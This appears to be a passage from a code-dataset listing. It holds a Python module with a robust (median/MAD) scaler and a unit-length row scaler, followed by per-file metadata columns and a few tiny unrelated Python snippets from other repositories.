def __init__(self, x_cols=[], y_cols=[], k=3.0, skipna=True, sklearn_output=False, name=None):
Transformer.__init__(self, sklearn_output=sklearn_output, name=name)
self.x_cols = x_cols
self.y_cols = y_cols
self.k = k
self.skipna = skipna
# the inverse mapping is needed to invert the transformation
self._inverse_map = {'x': {}, 'y': {}}
def fit_x(self, x):
self.x_cols = _check_cols(x, self.x_cols, self.logging)
self.logging('x_cols: {}'.format(self.x_cols), level=logging.DEBUG)
return self
def fit_y(self, y):
self.y_cols = _check_cols(y, self.y_cols, self.logging)
self.logging('y_cols: {}'.format(self.y_cols), level=logging.DEBUG)
return self
def transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
_median = _x[self.x_cols].median(skipna=self.skipna)
_mad = _x[self.x_cols].mad(skipna=self.skipna)
self._inverse_map['x'] = (_median, _mad)
_x[self.x_cols] = (_x[self.x_cols] - _median) / (self.k * _mad)
return _x
def transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
_median = _y[self.y_cols].median(skipna=self.skipna)
_mad = _y[self.y_cols].mad(skipna=self.skipna)
self._inverse_map['y'] = (_median, _mad)
_y[self.y_cols] = (_y[self.y_cols] - _median) / (self.k * _mad)
return _y
def inverse_transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
_median, _mad = self._inverse_map['x']
_x[self.x_cols] = _x[self.x_cols] * self.k * _mad + _median
return _x
def inverse_transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
_median, _mad = self._inverse_map['y']
_y[self.y_cols] = _y[self.y_cols] * self.k * _mad + _median
return _y
class UnitLenghtScaler(Transformer):
"""Scale the feature vector to have norm 1.0.
This will scale the data (by row) following X' = X / norm(X).
Args:
:param x_cols: a list of columns name or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param y_cols: a list of columns name or a list of indices; 'all' to use all columns; if [] no columns will be affected (default: `[]`)
:param invertible: if true collect additional data make the transformer invertible. Note that
this requires to store one value for each row in `x` and `y` (default: `True`)
:param sklearn_output: if True produces outputs compatible with sklearn Pipeline (default: `False`)
:param name: name for this transformer
Examples:
>>> scaler = UnitLenghtScaler()
>>> x_new, y_new = scaler.fit_transform(x, y)
"""
def __init__(self, x_cols='all', y_cols=[], invertible=True, sklearn_output=False, name=None):
Transformer.__init__(self, sklearn_output=sklearn_output, name=name)
self.x_cols = x_cols
self.y_cols = y_cols
self.invertible = invertible
# the inverse mapping is needed to invert the transformation
self._inverse_map = {'x': None, 'y': None}
def fit_x(self, x):
self.x_cols = _check_cols(x, self.x_cols, self.logging)
self.logging('x_cols: {}'.format(self.x_cols), level=logging.DEBUG)
return self
def fit_y(self, y):
self.y_cols = _check_cols(y, self.y_cols, self.logging)
self.logging('y_cols: {}'.format(self.y_cols), level=logging.DEBUG)
return self
def transform_x(self, x):
if len(self.x_cols) == 0:
return x
_x = x.copy()
n = numpy.sqrt(numpy.square(_x[self.x_cols]).sum(axis=1))
if self.invertible:
self._inverse_map['x'] = n
_x[self.x_cols] = _x[self.x_cols].div(n, axis=0)
return _x
def transform_y(self, y):
if len(self.y_cols) == 0:
return y
_y = y.copy()
n = numpy.sqrt(numpy.square(_y[self.y_cols]).sum(axis=1))
if self.invertible:
self._inverse_map['y'] = n
_y[self.y_cols] = _y[self.y_cols].div(n, axis=0)
return _y
def inverse_transform_x(self, x):
if len(self.x_cols) == 0:
return x
if not self.invertible:
self.logging('the transformer has not been set to be invertible, you should set invertible=True',
level=logging.WARNING)
return x
_x = x.copy()
_x[self.x_cols] = _x[self.x_cols].mul(self._inverse_map['x'], axis=0)
return _x
def inverse_transform_y(self, y):
if len(self.y_cols) == 0:
return y
if not self.invertible:
self.logging('the transformer has not been set to be invertible, you should set invertible=True',
level=logging.WARNING)
return y
_y = y.copy()
_y[self.y_cols] = _y[self.y_cols].mul(self._inverse_map['y'], axis=0)
return _y
| 38.16875
| 143
| 0.599804
| 1,816
| 12,214
| 3.785242
| 0.073789
| 0.050189
| 0.070701
| 0.049462
| 0.889438
| 0.871836
| 0.826157
| 0.817283
| 0.754292
| 0.754292
| 0
| 0.005259
| 0.268299
| 12,214
| 319
| 144
| 38.288401
| 0.763903
| 0.289422
| 0
| 0.694175
| 0
| 0
| 0.037243
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.135922
| false
| 0
| 0.019417
| 0
| 0.378641
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
22ecdeef7d9419e057fbf8fcce25c512f86fa6f7
| 39
|
py
|
Python
|
getAllPages/app.py
|
alucardlockon/RESTfulTest
|
6e71c2619bfec214baf869322f6cea16b814b4fe
|
[
"MIT"
] | null | null | null |
getAllPages/app.py
|
alucardlockon/RESTfulTest
|
6e71c2619bfec214baf869322f6cea16b814b4fe
|
[
"MIT"
] | null | null | null |
getAllPages/app.py
|
alucardlockon/RESTfulTest
|
6e71c2619bfec214baf869322f6cea16b814b4fe
|
[
"MIT"
] | null | null | null |
import sys
print sys.version_info
| 4.875
| 22
| 0.74359
| 6
| 39
| 4.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 39
| 7
| 23
| 5.571429
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.5
| null | null | 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
fe1687817672475105aae6254f9baac4e0b8c902
| 114
|
py
|
Python
|
Exe_03.py
|
Oreder/PythonSelfStudy
|
64c774ef469dcede6f653ab8eafd3edc83452876
|
[
"MIT"
] | 1
|
2017-07-28T03:42:29.000Z
|
2017-07-28T03:42:29.000Z
|
Exe_03.py
|
Oreder/PythonSelfStudy
|
64c774ef469dcede6f653ab8eafd3edc83452876
|
[
"MIT"
] | null | null | null |
Exe_03.py
|
Oreder/PythonSelfStudy
|
64c774ef469dcede6f653ab8eafd3edc83452876
|
[
"MIT"
] | null | null | null |
print(3 + 2 > 5 + 7)
print("Is it greater?", 3 > -2)
print("Roosters", 100 - 25 * 3 % 4)
print(7.0/4.0)
print(7/4)
| 22.8
| 35
| 0.552632
| 25
| 114
| 2.52
| 0.52
| 0.063492
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206522
| 0.192982
| 114
| 5
| 36
| 22.8
| 0.478261
| 0
| 0
| 0
| 0
| 0
| 0.191304
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
a3a7706e82f093c74c5bdd85efff3685bf4925f4
| 43
|
py
|
Python
|
runner.py
|
talajasi7/bookmarking-app
|
f489317751d248b84f728fb331a35a590f0a7669
|
[
"Apache-2.0"
] | null | null | null |
runner.py
|
talajasi7/bookmarking-app
|
f489317751d248b84f728fb331a35a590f0a7669
|
[
"Apache-2.0"
] | null | null | null |
runner.py
|
talajasi7/bookmarking-app
|
f489317751d248b84f728fb331a35a590f0a7669
|
[
"Apache-2.0"
] | null | null | null |
from src.bark import run_bark
run_bark()
| 8.6
| 29
| 0.767442
| 8
| 43
| 3.875
| 0.625
| 0.451613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 43
| 4
| 30
| 10.75
| 0.861111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
a3fc3215a7189801f0425365c3fc82ad3511e9df
| 115
|
py
|
Python
|
pocketcasts/__init__.py
|
dbeley/python-pocketcasts
|
bf200f94e08a61f7a51c6c05ce9b87ef69d8535e
|
[
"MIT"
] | 2
|
2021-06-25T21:15:52.000Z
|
2021-08-16T16:26:11.000Z
|
pocketcasts/__init__.py
|
dbeley/python-pocketcasts
|
bf200f94e08a61f7a51c6c05ce9b87ef69d8535e
|
[
"MIT"
] | null | null | null |
pocketcasts/__init__.py
|
dbeley/python-pocketcasts
|
bf200f94e08a61f7a51c6c05ce9b87ef69d8535e
|
[
"MIT"
] | 1
|
2020-04-14T17:23:16.000Z
|
2020-04-14T17:23:16.000Z
|
"""TODO"""
from .api import Api # noqa
from .episode import Episode # noqa
from .podcast import Podcast # noqa
| 19.166667
| 36
| 0.695652
| 16
| 115
| 5
| 0.4375
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 115
| 5
| 37
| 23
| 0.869565
| 0.173913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.